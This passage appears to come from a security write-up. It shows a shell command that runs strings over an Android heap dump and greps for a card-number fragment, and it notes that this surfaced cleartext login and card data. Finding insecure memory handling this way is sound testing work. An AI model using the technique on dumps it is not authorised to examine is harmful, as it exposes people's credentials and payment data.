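strings dump.hprof | grep '9212'    # search by a known card fragment
```

The same two commands against a real converted hprof file are what surfaced the cleartext login and card data described in the post.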